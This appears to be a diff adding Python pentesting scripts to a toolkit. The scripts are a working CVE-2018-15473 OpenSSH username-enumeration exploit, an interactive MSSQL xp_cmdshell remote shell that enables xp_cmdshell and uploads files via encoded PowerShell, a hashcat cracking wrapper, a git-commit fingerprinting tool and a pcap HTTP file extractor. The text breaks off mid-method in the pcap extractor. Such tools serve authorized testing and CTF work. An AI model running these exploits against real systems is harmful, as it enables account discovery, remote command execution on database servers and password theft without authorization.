Executable file
85
tools/exploits/ssh-check-username.py
Executable file
@@ -0,0 +1,85 @@
|
||||
#!/usr/bin/python3
|
||||
import multiprocessing
|
||||
import threading
|
||||
import time
|
||||
import os
|
||||
import argparse
|
||||
import logging
|
||||
import paramiko
|
||||
import socket
|
||||
import sys
|
||||
import pdb
|
||||
|
||||
# CVE-2018-15473 (OpenSSH 7.7)
|
||||
|
||||
class InvalidUsername(Exception):
    """Raised by the patched auth handler when the server rejects the username early."""
    pass
|
||||
|
||||
|
||||
def add_boolean(*args, **kwargs):
    """No-op replacement for Message.add_boolean: malforms the auth packet on purpose."""
    return None
|
||||
|
||||
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
|
||||
|
||||
def service_accept(*args, **kwargs):
    """Patch Message.add_boolean just before auth, then defer to the original handler."""
    paramiko.message.Message.add_boolean = add_boolean
    return old_service_accept(*args, **kwargs)
|
||||
|
||||
|
||||
def userauth_failure(*args, **kwargs):
    """An early MSG_USERAUTH_FAILURE signals the username does not exist."""
    raise InvalidUsername()
|
||||
|
||||
|
||||
def _paramiko_tunnel(username, *args, **kwargs):
    """Probe one username against the module-level target:port (CVE-2018-15473).

    Prints whether the username is valid based on which exception the
    patched paramiko handlers raise during malformed public-key auth.
    """
    sock = socket.socket()
    sock.connect((target, port))
    us = username.strip()
    try:
        transport = paramiko.transport.Transport(sock)
    except socket.error:
        print ('[-] Failed to connect')
        return
    try:
        transport.start_client()
    except paramiko.ssh_exception.SSHException:
        print ('[-] Failed to negotiate SSH transport')
        return
    try:
        transport.auth_publickey(us, paramiko.RSAKey.generate(2048))
    # BUG FIX: `except InvalidUsername or socket.error` evaluates the `or`
    # first and only ever caught InvalidUsername; a tuple catches both.
    except (InvalidUsername, socket.error):
        print ('[*] {} - Invalid username'.format(us))
    except paramiko.ssh_exception.AuthenticationException:
        print ('[+] {} - Valid username'.format(us))
    return
|
||||
|
||||
if __name__ == "__main__":
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('-H',dest='hostname', type=str, help='Single target')
    arg_parser.add_argument('-t',dest='threads', type=int, help='Number of threads', default=10)
    arg_parser.add_argument('-p',dest='port', type=int, default=22, help='port to connect on: Default port is 22')
    arg_parser.add_argument('-u',dest='username', type=str, help='username you want to enumerate')
    arg_parser.add_argument('-w',dest='wordlist', help='enumerate multiple users')
    args = arg_parser.parse_args()
    # module-level globals read by _paramiko_tunnel
    port = args.port
    target = args.hostname

    # swap in the malformed-auth handlers (see service_accept / userauth_failure)
    paramiko.auth_handler.AuthHandler._client_handler_table.update({
        paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
        paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
    })

    # silence paramiko's transport warnings
    logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

    if args.username is not None:
        # BUG FIX: was `_paramiko_tunnel(target, port, username)` -- the
        # function's first positional parameter is the USERNAME (target/port
        # are globals), so the hostname was being probed as a username.
        _paramiko_tunnel(args.username)

    if args.wordlist is not None:
        pool = multiprocessing.Pool(args.threads)
        with open(args.wordlist) as f:
            usernames = [u for u in f]
        pool.map(_paramiko_tunnel, usernames)
|
||||
181
tools/exploits/xp_cmdshell.py
Executable file
181
tools/exploits/xp_cmdshell.py
Executable file
@@ -0,0 +1,181 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
# interactive xp_cmdshell
|
||||
# with impacket and cmd
|
||||
# used https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py for reference
|
||||
import base64
|
||||
import cmd
|
||||
import argparse
|
||||
|
||||
from impacket import tds
|
||||
|
||||
|
||||
class XpShell(cmd.Cmd):
    """Interactive shell that tunnels commands through MSSQL xp_cmdshell.

    Wraps an impacket ``tds.MSSQL`` connection; every line typed at the
    prompt is executed on the server via ``exec master..xp_cmdshell``.
    """

    def __init__(self, SQLObj):
        cmd.Cmd.__init__(self)
        self.sql = SQLObj          # authenticated impacket tds.MSSQL object
        self.prompt = 'xp_cmd> '
        self.file = None
        self.pwsh = False          # when True, wrap commands in powershell -encodedCommand

    @staticmethod
    def powershell_encode(data):
        """Base64-encode a string as UTF-16LE, the encoding -encodedCommand expects."""
        return base64.b64encode(data.encode('UTF-16LE')).decode()

    @staticmethod
    def powershell_encode_binary(data):
        """Base64-encode raw bytes (for [Convert]::FromBase64String on the target)."""
        return base64.b64encode(data).decode()

    def default(self, arg):
        """Treat every unrecognized line as a system command to run remotely."""
        try:
            if self.pwsh:
                new_arg = 'powershell -encodedCommand {}'
                arg = new_arg.format(self.powershell_encode(arg))

            self.execute_query(arg)

        except ConnectionResetError as e:
            # connection dropped mid-command: reconnect once and retry
            self.reconnect_mssql()
            self.execute_query(arg)
        except Exception as e:
            print('Exception: ')
            print(str(e))
            raise e

    # i wont say what it does
    def do_exit(self, arg):
        exit()

    # ? yes
    def do_help(self, arg):
        print("""
    you found the help command

    pwsh - Toggle powershell on/off
    upload <src> <dest> - upload a file
    exit - i wont say what it does
""")

    def do_upload(self, arg):
        """upload <src> <dest> -- copy a local file to the target via powershell.

        FIX: cmd.Cmd passes the whole argument line as one string; the old
        signature ``do_upload(self, data, dest)`` raised a TypeError the
        moment the command was used, and never read the local file at all.
        """
        try:
            src, dest = arg.split()
        except ValueError:
            print('Usage: upload <src> <dest>')
            return

        try:
            with open(src, 'rb') as f:
                data = f.read()
        except OSError as e:
            print('Could not read local file: ')
            print(str(e))
            return

        # create/overwrite the target file with powershell
        cmd = 'New-Item -Path {} -Force'.format(dest)
        cmd = self.powershell_encode(cmd)
        try:
            self.execute_query('powershell -encodedCommand {}'.format(cmd))
        except ConnectionResetError as e:
            self.reconnect_mssql()
            self.execute_query('powershell -encodedCommand {}'.format(cmd))
        except Exception as e:
            print('Exception: ')
            print(str(e))
            return

        # append the file contents in fixed-size chunks; each chunk is one
        # base64 Add-Content round-trip on the target
        write_count = 2000
        total_uploaded = 0
        for offset in range(0, len(data), write_count):
            chunk = data[offset:offset + write_count]
            self.write_bytes_to_file(bytearray(chunk), dest)
            total_uploaded += len(chunk)
            print('Uploaded {} of {} bytes'.format(total_uploaded, len(data)))

    # executed when ConnectionResetError
    def reconnect_mssql(self):
        print('connection lost attempting to reconnect...')
        self.sql.disconnect()
        # FIXME(review): connect_mssql requires the target ip and returns a
        # single value (XpShell or the login result), so this tuple-unpacking
        # zero-arg call cannot work as written; the connection parameters
        # would need to be stored on self to reconnect properly.
        ms_sql, res = connect_mssql()
        if res is True:
            self.sql = ms_sql
            print('Success!')
        else:
            print('Could not re-establish connection. Exiting.')
            exit()

    # execute xp_cmdshell command
    def execute_query(self, arg):
        self.sql.sql_query("exec master..xp_cmdshell '{}'".format(arg))
        self.sql.printReplies()
        # widen the output column so long lines are not truncated
        self.sql.colMeta[0]['TypeData'] = 80*1
        self.sql.printRows()

    def do_enable_xp_cmdshell(self, arg=None):
        """Enable xp_cmdshell on the server (requires sysadmin).

        ``arg`` defaults to None so both the cmd.Cmd dispatcher (which passes
        the argument line) and the direct call in ``__main__`` work; the old
        zero-argument signature crashed when typed as a shell command.
        """
        try:
            self.sql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
                               "exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
            self.sql.printReplies()
            self.sql.printRows()
        except Exception as e:
            raise e

    # encodes bytes as base64 and writes them to a file via powershell
    def write_bytes_to_file(self, data, target):
        data = self.powershell_encode_binary(data)

        # cmd to append bytes to file
        cmd = "powershell -command \"Add-Content -value ([Convert]::FromBase64String(\'{}\')) -encoding byte -path \'{}\'\"".format(data, target)
        cmd = self.powershell_encode(cmd)

        # execute file write
        try:
            self.execute_query('powershell -encodedCommand {}'.format(cmd))
        except ConnectionResetError as e:
            self.reconnect_mssql()
|
||||
|
||||
|
||||
def connect_mssql(ip, port=1433, username="sa", password="", domain=""):
    """Connect and log in to an MSSQL server.

    Returns an XpShell wrapping the connection when the login succeeds,
    otherwise the (falsy) login result itself.
    """
    # do database connection (simple for now)
    server = tds.MSSQL(ip, port)
    server.connect()
    login_ok = server.login(database=None, username=username, password=password, domain=domain)
    server.printReplies()
    print(login_ok)
    if not login_ok:
        return login_ok
    return XpShell(server)
|
||||
|
||||
|
||||
if __name__ == '__main__':
    # pass commands directly into powershell
    # ./xp_cmdshell.py -powershell
    # if len(sys.argv) > 1 and sys.argv[1] == '-powershell':
    #     pwsh = True

    cli = argparse.ArgumentParser(description="Connect to mssql server using username, password, and hostname.")
    cli.add_argument('-u', '--username', required=True, help="Username for the server")
    cli.add_argument('-p', '--password', required=False, default="", help="Password for the server")
    cli.add_argument('-H', '--hostname', required=True, help="Hostname or IP address of the server")
    cli.add_argument('-d', '--domain', required=False, default=None, help="Domain the user belongs to")
    opts = cli.parse_args()

    # if connection successful
    shell = connect_mssql(opts.hostname, username=opts.username, password=opts.password, domain=opts.domain)
    if isinstance(shell, XpShell):
        shell.do_enable_xp_cmdshell()
        shell.pwsh = True
        shell.cmdloop()
        shell.sql.disconnect()
|
||||
100
tools/misc/crack_hash.py
Executable file
100
tools/misc/crack_hash.py
Executable file
@@ -0,0 +1,100 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import subprocess
|
||||
import json
|
||||
import tempfile
|
||||
from name_that_hash import runner
|
||||
|
||||
def load_cracked_hashes(potfile_path=None):
    """Parse a hashcat potfile into a ``{hash: password}`` dict.

    Args:
        potfile_path: Optional explicit potfile path.  Defaults to the
            standard ``~/.hashcat/hashcat.potfile`` location (backward
            compatible with the original zero-argument call).

    Returns:
        Dict mapping everything left of the LAST ':' (so salted entries keep
        their salt in the key) to the cracked password.  Empty dict when the
        potfile does not exist.
    """
    if potfile_path is None:
        potfile_path = os.path.join(os.path.expanduser("~"), ".hashcat", "hashcat.potfile")

    cracked_hashes = { }
    if os.path.isfile(potfile_path):
        with open(potfile_path, "r") as f:
            for line in f:
                line = line.strip()
                # skip blank/malformed lines instead of crashing on the
                # unpacking (the old code raised ValueError on a line
                # without a ':' separator)
                if ":" not in line:
                    continue
                digest, password = line.rsplit(":", 1)
                cracked_hashes[digest] = password

    return cracked_hashes
|
||||
|
||||
# Entry point: crack a file of hashes with hashcat, consulting the local
# potfile first and auto-detecting candidate hash types via name-that-hash.
if __name__ == "__main__":

    if len(sys.argv) < 2:
        print("Usage: %s <file>" % sys.argv[0])
        exit(1)

    # All non-empty input lines.  NOTE(review): `hash` shadows the builtin
    # throughout this script, and the input file handle is never closed.
    hashes = filter(None, [line.strip() for line in open(sys.argv[1],"r").readlines()])
    potfile = load_cracked_hashes()
    if potfile:
        # Split into already-cracked (reported immediately) and uncracked.
        uncracked_hashes = []
        for hash in hashes:
            # Look up the full line first, then the part before the last ':'
            # (covers hash:salt style potfile entries).
            password = potfile.get(hash, potfile.get(hash.rsplit(":", 1)[0], None))
            if password:
                print(f"Potfile: {hash}: {password}")
            else:
                uncracked_hashes.append(hash)
    else:
        uncracked_hashes = hashes

    # Ask name-that-hash for candidate hash types of every uncracked hash.
    hashes = json.loads(runner.api_return_hashes_as_json(uncracked_hashes))
    wordlist = "/usr/share/wordlists/rockyou.txt" if len(sys.argv) < 3 else sys.argv[2]

    # Group by hashcat mode id: {mode: {"name": ..., "hashes": set_of_hashes}}
    hash_types = { }
    for hash, types in hashes.items():
        for t in types:
            hash_id = t["hashcat"]
            if hash_id is None:
                # type known to name-that-hash but hashcat has no mode for it
                continue

            # Heuristic: a ':' in the hash implies a salted/extended format;
            # only keep candidate types whose "extended" flag agrees.
            salted = ":" in hash
            if salted != t["extended"]:
                continue

            if hash_id not in hash_types:
                hash_types[hash_id] = { "name": t["name"], "hashes": {hash} }
            else:
                hash_types[hash_id]["hashes"].add(hash)

    if len(hash_types) > 0:
        uncracked_types = list(hash_types.keys())
        num_types = len(uncracked_types)
        if num_types > 1:
            # Multiple candidate types: print an aligned menu and let the
            # user pick the hashcat mode to run.
            print("There are multiple uncracked hashes left with different hash types, choose one to proceed with hashcat:")
            print()

            i = 0
            for hash_id, hash_type in hash_types.items():
                # pad the name column to the longest type name
                name = (hash_type["name"] + ": ").ljust(max(len(x["name"]) for x in hash_types.values()) + 2)
                count = len(hash_type["hashes"])
                index = (f"{i}. ").ljust(len(str(num_types - 1)) + 2)
                print(f"{index}{name}{count} hashe(s)")
                i += 1

            # Prompt until a valid index is entered; Ctrl-D / Ctrl-C aborts.
            selected = None
            while selected is None or selected < 0 or selected >= num_types:
                try:
                    selected = int(input("Your Choice: ").strip())
                    if selected >= 0 and selected < num_types:
                        break
                except Exception as e:
                    if type(e) in [EOFError, KeyboardInterrupt]:
                        print()
                        exit()

                print("Invalid input")
            selected_type = uncracked_types[selected]
        else:
            selected_type = uncracked_types[0]

        # Write the selected hashes to a temp file and hand them to hashcat.
        fp = tempfile.NamedTemporaryFile()
        for hash in hash_types[selected_type]["hashes"]:
            fp.write(b"%s\n" % hash.encode("UTF-8"))
        fp.flush()

        # NOTE(review): sys.argv[2:] re-appends the wordlist argument as an
        # extra hashcat positional — confirm this duplication is intended.
        proc = subprocess.Popen(["hashcat", "-m", str(selected_type), "-a", "0", fp.name, wordlist] + sys.argv[2:])
        proc.wait()
        fp.close()
    else:
        print("No uncracked hashes left")
|
||||
185
tools/misc/find_git_commit.py
Executable file
185
tools/misc/find_git_commit.py
Executable file
@@ -0,0 +1,185 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import argparse
|
||||
import re
|
||||
import os
|
||||
import tempfile
|
||||
import subprocess
|
||||
import collections
|
||||
import shutil
|
||||
import hashlib
|
||||
import datetime
|
||||
|
||||
PROC_ENV = { "LC_ALL": "C" }
|
||||
|
||||
def run_cmd(cmd, dir=None, raw=False):
    """Run *cmd*, returning ``(exit_code, output)`` with stdout and stderr merged.

    The child environment is the CURRENT environment plus ``LC_ALL=C`` so
    git's messages are not localized (callers match on English text).
    Passing only ``PROC_ENV`` as env — as before — dropped ``PATH``, which
    can make the executable lookup in the child fail entirely.

    Args:
        cmd: argv list for the subprocess.
        dir: working directory for the child (None = inherit).
        raw: when True, return output as bytes; otherwise decoded/stripped.
    """
    env = dict(os.environ, **PROC_ENV)
    proc = subprocess.Popen(cmd, cwd=dir, env=env, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
    # communicate() returns (stdout, stderr); concatenate them in that order
    out = b"".join(proc.communicate())

    if not raw:
        out = out.decode().strip()

    return proc.returncode, out
|
||||
|
||||
|
||||
def check_git_dir(dir):
    """Verify *dir* is a clean, up-to-date git checkout.

    Prints a reason and returns False when it is not a repository, is not in
    a clean state, or git-status itself failed; True otherwise.
    """
    exit_code, out = run_cmd(["git", "status"], dir)

    if "not a git repository" in out:
        print("[-] Given directory is not a git repository.")
        return False

    # clean means BOTH phrases appear in the status output
    is_clean = "Your branch is up to date" in out \
        and "nothing to commit, working tree clean" in out
    if not is_clean:
        print("[-] Git repository is not in a clean state, please reset it to HEAD")
        return False

    if exit_code != 0:
        print("[-] Error checking given directory:", out)
        return False

    return True
|
||||
|
||||
|
||||
def git_clone(dir, url):
    """Quietly clone *url* into *dir*; return True on success.

    On failure prints git's output and returns False.
    """
    print(f"[ ] Cloning {url} to {dir}")
    exit_code, out = run_cmd(["git", "clone", url, dir, "-q"])
    if exit_code != 0:
        # fixed typo in the error message ("cloing" -> "cloning")
        print("[-] Error cloning git repository:")
        print(out)
        return False
    return True
|
||||
|
||||
|
||||
def check_input_dir(dir):
    """Validate the download directory and collect its non-empty files.

    Returns a list of file paths relative to *dir*, or False when *dir* is
    not a directory, is itself a git repository, or holds no non-empty file.
    """
    if not os.path.isdir(dir):
        print("[-] Invalid directory:", dir)
        return False

    if os.path.isdir(os.path.join(dir, ".git")):
        print("[-] Directory to check should not be a git repository")
        return False

    base = os.path.realpath(dir)
    collected = []
    for parent, _, names in os.walk(dir):
        for name in names:
            resolved = os.path.realpath(os.path.join(parent, name))
            # only keep files with content; strip the root prefix + separator
            if os.path.getsize(resolved) > 0:
                collected.append(resolved[len(base) + 1:])

    if not collected:
        print("[-] Given directory does not contain any non-empty files")
        return False

    return collected
|
||||
|
||||
|
||||
def get_commits_for_file(file, git_dir):
    """Return an OrderedDict {commit_hash: unix_timestamp} of every commit
    touching *file* on any branch (newest first, git-log order), or None
    when git-log fails.
    """
    cmd = ["git","log","--no-color", "--pretty=format:%H %at", "--all","--", file]
    exit_code, out = run_cmd(cmd, git_dir)
    if exit_code != 0:
        print("[-] git-log failed:", out)
        return None

    # each line is "<hash> <author-timestamp>"; removed the unused
    # `data = line.split(" ")` duplicate of the unpacking below
    commits = collections.OrderedDict()
    for line in out.split("\n"):
        if line:
            hash, ts = line.split(" ")
            commits[hash] = int(ts)

    return commits
|
||||
|
||||
def hash(data, alg):
    """Digest *data* with the hashlib algorithm named *alg*; return hex string.

    NOTE: intentionally shadows the builtin ``hash`` within this module.
    """
    return hashlib.new(alg, data).hexdigest()
|
||||
|
||||
def read_file(file):
    """Return the raw bytes of *file*."""
    with open(file, "rb") as handle:
        return handle.read()
|
||||
|
||||
def find_newest_commit(git_dir, file_name, sha1hash, md5hash, commits):
    """Return the first commit whose version of *file_name* matches both digests.

    Iterates ``reversed(commits)``; git-log emits newest first, so this walks
    oldest-to-newest and returns the OLDEST matching commit.
    NOTE(review): that is at odds with the function name — confirm intent.
    Returns None when no commit matches or git-show fails.
    """
    for candidate in reversed(commits.keys()):
        exit_code, blob = run_cmd(["git", "show", f"{candidate}:{file_name}"], git_dir, raw=True)
        if exit_code != 0:
            print("[-] git-show failed:", blob)
            return None
        if hash(blob, "sha1") == sha1hash and hash(blob, "md5") == md5hash:
            return candidate
    return None
|
||||
|
||||
def get_commit_message(dir, commit_hash):
    """Return the full commit message body of *commit_hash*, or None on error."""
    log_cmd = ["git","log","--no-color", "--pretty=format:%B", "-n1", commit_hash]
    exit_code, out = run_cmd(log_cmd, dir)
    if exit_code != 0:
        print("[-] git-log failed:", out)
        return None
    return out
|
||||
|
||||
def run(files, root_dir, git_dir):
    """For every file, find a commit in *git_dir* whose blob matches it
    byte-for-byte, then report the most recent matching commit overall.

    Args:
        files: paths relative to *root_dir* (as produced by check_input_dir).
        root_dir: directory containing the downloaded files.
        git_dir: local git checkout to compare against.
    """
    latest_commit = None
    latest_ts = None

    for f in files:
        commits = get_commits_for_file(f, git_dir)
        if commits:
            print(f"[+] {f} found in git history")
            # read the file ONCE and derive both digests from the same bytes
            # (previously the file was read twice, once per digest)
            content = read_file(os.path.join(root_dir, f))
            sha1hash = hash(content, "sha1")
            md5hash = hash(content, "md5")
            found_commit = find_newest_commit(git_dir, f, sha1hash, md5hash, commits)
            if found_commit:
                print(f"[+] Commit {found_commit} matches")
                # keep the commit with the largest timestamp across all files
                if latest_commit is None or commits[found_commit] > latest_ts:
                    latest_commit = found_commit
                    latest_ts = commits[found_commit]
        else:
            print(f"[-] {f} not found in git history")

    if latest_commit is None:
        print("[-] No matching commit found")
    else:
        title = get_commit_message(git_dir, latest_commit)
        formatted_dt = datetime.datetime.fromtimestamp(latest_ts).strftime("%A, %d. %B %Y %I:%M%p")
        print(f"[+] Commit might be: {latest_commit}, {formatted_dt}, {title}")
|
||||
|
||||
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        dest="dir",
        help="The directory containing downloaded files"
    )
    parser.add_argument(
        dest="git",
        help="URL or path to git repository to compare to"
    )
    parser.add_argument(
        "-n",
        "--no-delete",
        dest="nodelete",
        action="store_true",
        help="Don't delete the git directory after cloning"
    )

    is_remote_git = False
    args = parser.parse_args()
    git_dir = args.git
    # remote specs: git://, http(s)://, or scp-like user@host:path
    if re.match("^(git|https?)://.*", args.git) or \
            (len(args.git.split(":")) == 2 and "@" in args.git.split(":")[0]):
        # FIX: tempfile.TemporaryDirectory(...).name without keeping the
        # object alive lets the finalizer delete the directory as soon as it
        # is garbage-collected, racing the clone; mkdtemp has no finalizer
        # (we remove it ourselves below).
        git_dir = tempfile.mkdtemp(suffix=".git")
        is_remote_git = True
        if not git_clone(git_dir, args.git):
            exit(1)

    if check_git_dir(git_dir):
        valid_files = check_input_dir(args.dir)
        # identity check: valid_files is either a list or the literal False
        if valid_files is not False:
            run(valid_files, args.dir, git_dir)

    # clean up the temporary clone unless the user asked to keep it
    if is_remote_git and not args.nodelete:
        shutil.rmtree(git_dir)
|
||||
362
tools/misc/pcap_file_extract.py
Executable file
362
tools/misc/pcap_file_extract.py
Executable file
@@ -0,0 +1,362 @@
|
||||
#!/bin/python
|
||||
|
||||
import argparse
|
||||
import os
|
||||
import re
|
||||
from abc import ABC, abstractmethod
|
||||
from scapy.all import *
|
||||
from hackingscripts import util
|
||||
from collections import OrderedDict
|
||||
|
||||
|
||||
class HttpPacket(ABC):
    """Base class for a reassembled HTTP message (request or response)."""

    def __init__(self, sock_src, version):
        self.version = version
        # header names are case-insensitive per RFC 7230
        self.headers = util.CaseInsensitiveDict()
        self.payload = None
        self.socket = sock_src

    @staticmethod
    def parse(sock_src, data):
        """Parse raw bytes into an HttpRequest or HttpResponse.

        Returns None when the first line matches neither a request line nor
        a status line.  NOTE(review): raises ValueError when *data* contains
        no CRLF or no blank line separating headers from the body.
        """
        index = data.index(b"\r\n")
        first_line = data[0:index+2].decode()
        matches_req = re.match(HttpRequest.PATTERN.decode(), first_line)
        matches_res = re.match(HttpResponse.PATTERN.decode(), first_line)
        if matches_req:
            http_packet = HttpRequest(sock_src, *matches_req.groups())
        elif matches_res:
            http_packet = HttpResponse(sock_src, *matches_res.groups())
        else:
            return None

        # headers run up to the first blank line; the body starts right after
        header_end = data.index(b"\r\n\r\n")
        header_buffer = data[index+2:header_end+2].decode()
        http_packet.payload = data[header_end+4:]
        # each "Name: value\r\n" pair goes into the case-insensitive dict
        for line in re.findall("([^:]+):\s?(.*)\r\n", header_buffer):
            http_packet.headers[line[0]] = line[1]

        return http_packet

    @abstractmethod
    def get_file_path(self):
        """Return a file path/name representing this message, or None."""
        pass
|
||||
|
||||
|
||||
class HttpRequest(HttpPacket):
    """A parsed HTTP request; the request line drives PATTERN matching."""

    # request line: METHOD URI HTTP/x.y
    PATTERN = b"([A-Z]+) ([^ ]+) HTTP/([0-9.]+)\r\n"

    def __init__(self, socket, method, uri, version):
        super().__init__(socket, version)
        self.method = method
        self.uri = uri

    def __repr__(self):
        size = util.human_readable_size(len(self.payload))
        return f"{self.method} {self.uri} HTTP/{self.version}, payload={size}"

    def get_file_path(self):
        """The requested URI doubles as the file path."""
        return self.uri
|
||||
|
||||
|
||||
class HttpResponse(HttpPacket):
    """A parsed HTTP response; optionally linked to its originating request."""

    # status line: HTTP/x.y CODE TEXT
    PATTERN = b"HTTP/([0-9.]+) ([0-9]+) (.*)\r\n"

    def __init__(self, socket, version, status_code, status_text):
        super().__init__(socket, version)
        self.status_code = int(status_code)
        self.status_text = status_text
        # set by the extractor to the HttpRequest this response answers
        self.response_to = None

    def get_file_path(self):
        """Best-effort file name: Content-Disposition first, then the
        originating request's URI, else None."""
        content_disposition = self.headers.get("Content-Disposition", None)
        if content_disposition:
            # FIX: the old pattern ";\s*filename=\"?(.*)\"?(;|$)" used a
            # greedy (.*) with an OPTIONAL closing quote, so it captured the
            # trailing '"' (filename="a.txt" yielded 'a.txt"').  Excluding
            # quotes/semicolons from the captured name fixes that.
            matches = re.findall(";\s*filename=\"?([^\";]*)\"?\s*(;|$)", content_disposition)
            if matches:
                return matches[0][0]

        if self.response_to:
            return self.response_to.get_file_path()

        return None

    def __repr__(self):
        return f"HTTP/{self.version} {self.status_code} {self.status_text}, payload=" + util.human_readable_size(len(self.payload))
|
||||
|
||||
class PacketIterator:
    """Forward-only cursor over a TcpConnection's packets with peek/pop/scan."""

    def __init__(self, connection):
        self.connection = connection
        self.index = 0  # position of the next packet to yield

    def __iter__(self):
        # iterating restarts from the beginning of the connection
        self.index = 0
        return self

    def __next__(self):
        if self.has_more():
            packet = self.connection.packets[self.index]
            self.index += 1
            return packet
        else:
            raise StopIteration

    def peek(self):
        """Return the next packet WITHOUT advancing, or None at the end."""
        return None if not self.has_more() else self.connection.packets[self.index]

    def pop(self):
        """Return the next packet and advance, or None at the end."""
        packet = self.peek()
        if packet:
            self.index += 1
        return packet

    def find_packet(self, pattern, sock_src=None):
        """Scan forward for the first TCP payload matching *pattern*.

        Advances the cursor past every packet examined, including the match.
        When *sock_src* is given, only packets sent from that "ip:port" are
        considered (others are skipped, but still consumed).

        Returns (packet, first regex match, sender "ip:port") or None when
        the remaining packets contain no match.
        """
        for packet in self.connection.packets[self.index:]:
            self.index += 1
            tcp_packet = packet[TCP]
            ip_hdr = packet[IP]
            packet_src = f"{ip_hdr.src}:{tcp_packet.sport}"
            if sock_src is not None and packet_src != sock_src:
                continue

            payload = bytes(tcp_packet.payload)
            match = re.findall(pattern, payload)
            if match:
                return packet, match[0], packet_src
        return None

    def has_more(self):
        """True while packets remain beyond the cursor."""
        return self.index < len(self.connection.packets)
|
||||
|
||||
|
||||
class TcpConnection:
    """All captured packets exchanged between two endpoints, in capture order."""

    def __init__(self, sock_a, sock_b):
        self.sock_a = sock_a
        self.sock_b = sock_b
        self.packets = []
        self._payload_size = 0  # running total of TCP payload bytes

    def add_packet(self, packet):
        self.packets.append(packet)
        self._payload_size += len(packet[TCP].payload)

    def get_key(self):
        """Normalized, direction-independent key for this connection."""
        return TcpConnections._format_key(self.sock_a, self.sock_b)

    def iterator(self):
        """Fresh PacketIterator positioned at the first packet."""
        return PacketIterator(self)

    def get_other_sock(self, sock):
        """Given one endpoint, return the peer endpoint."""
        if sock == self.sock_b:
            return self.sock_a
        return self.sock_b

    def __repr__(self):
        size = util.human_readable_size(self._payload_size)
        return f"{self.get_key()}: {len(self.packets)} packets, {size}"
|
||||
|
||||
|
||||
class TcpConnections:
    """Registry of TcpConnection objects keyed by their normalized socket pair."""

    def __init__(self):
        self.connections = OrderedDict()

    def __contains__(self, item: TcpConnection):
        # FIX: previously keyed on str(item) — the repr, which embeds the
        # mutable packet count — while add_packet keys on _format_key, so
        # membership tests could never match.  Key on the connection's
        # stable, normalized key instead.
        return item.get_key() in self.connections

    def add(self, element: TcpConnection):
        # FIX: same str(element) vs _format_key inconsistency as __contains__
        self.connections[element.get_key()] = element

    def __getitem__(self, item: TcpConnection):
        return self.connections[item.get_key()]

    def __iter__(self):
        return iter(self.connections.values())

    @staticmethod
    def _format_key(sock_a, sock_b):
        # order-independent key so both traffic directions share a connection
        return f"{sock_a}<->{sock_b}" if sock_a < sock_b else f"{sock_b}<->{sock_a}"

    def get_connection(self, sock_a, sock_b):
        return self.connections[self._format_key(sock_a, sock_b)]

    def add_packet(self, sock_src, sock_dst, packet):
        """Append *packet* to the connection for this socket pair, creating it on first sight."""
        key = self._format_key(sock_src, sock_dst)
        if key not in self.connections:
            self.connections[key] = TcpConnection(sock_src, sock_dst)

        self.connections[key].add_packet(packet)
        return self.connections[key]
|
||||
|
||||
|
||||
class PcapExtractor:
    """Reassembles HTTP messages from a pcap and extracts their payloads as files."""

    def __init__(self, pcap_path, output_dir="extracted_files/", filters=None):
        self.pcap_path = pcap_path
        self.output_dir = output_dir
        # each filter is a predicate over HttpPacket; all must pass
        self.filters = filters if filters is not None else []
        self._packets = None  # scapy PacketList, loaded lazily

    def _open_file(self):
        # loads the ENTIRE capture into memory
        self._packets = rdpcap(self.pcap_path)

    def extract_all(self):
        """Write the payload of every filtered HTTP message into output_dir.

        File names are derived from get_file_path() with '/' flattened to '_'.
        """
        self._open_file()
        http_packets = self._parse_http_packets()
        filtered_packets = self._apply_filters(http_packets)
        for packet in filtered_packets:
            if len(packet.payload) > 0:
                file_path = packet.get_file_path()
                with open(os.path.join(self.output_dir, file_path.replace("/", "_")), "wb") as f:
                    f.write(packet.payload)

                print(f"[+] Extracted: {file_path} {util.human_readable_size(len(packet.payload))} Bytes")

    def __iter__(self):
        # re-reads and re-parses the capture on every fresh iteration
        self._open_file()
        http_packets = self._parse_http_packets()
        self.iter_filtered_packets = self._apply_filters(http_packets)
        return iter(self.iter_filtered_packets)

    def __next__(self):
        return next(self.iter_filtered_packets)

    def _apply_filters(self, packets):
        # chain all predicates; a packet must satisfy every filter
        filtered_packets = packets
        for f in self.filters:
            filtered_packets = filter(f, filtered_packets)
        return list(filtered_packets)

    def list(self):
        """Print the filtered HTTP messages without extracting anything."""
        self._open_file()
        http_packets = self._parse_http_packets()
        filtered_packets = self._apply_filters(http_packets)
        for packet in filtered_packets:
            print(packet)

    def get_http_packet(self, packet_iterator, sock_src, initial_packet):
        """Reassemble one HTTP message sent by *sock_src*.

        Starting from *initial_packet*, consumes consecutive packets from the
        same sender and concatenates their TCP payloads until the peer talks
        (or packets run out), then parses the buffer into an HttpPacket.
        Retransmissions of single-byte probes (ZeroWindowProbe) are buffered
        and only flushed once a new sequence number shows they carried data.
        """
        http_buffer = raw(initial_packet[TCP].payload)
        prev_seq = initial_packet[TCP].seq
        buff = None  # (seq, payload) of a possibly-duplicated 1-byte segment
        while packet_iterator.has_more():
            next_packet = packet_iterator.peek()
            if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
                next_packet = packet_iterator.pop()

                if buff is not None:
                    # if there is a buffered package, and the seq. number was not reused
                    if buff[0] != next_packet[TCP].seq:
                        # append this to output
                        http_buffer += buff[1]
                        buff = None

                payload_len = len(next_packet[TCP].payload)
                if next_packet[TCP].seq - prev_seq != payload_len and payload_len == 1:
                    buff = (next_packet[TCP].seq, raw(next_packet[TCP].payload))
                    # potential TCP ZeroWindowProbe
                    continue

                # TODO: instead of assertions, we should make sure, the seq. is ascending
                assert next_packet[TCP].seq > prev_seq
                assert next_packet[IP].frag == 0
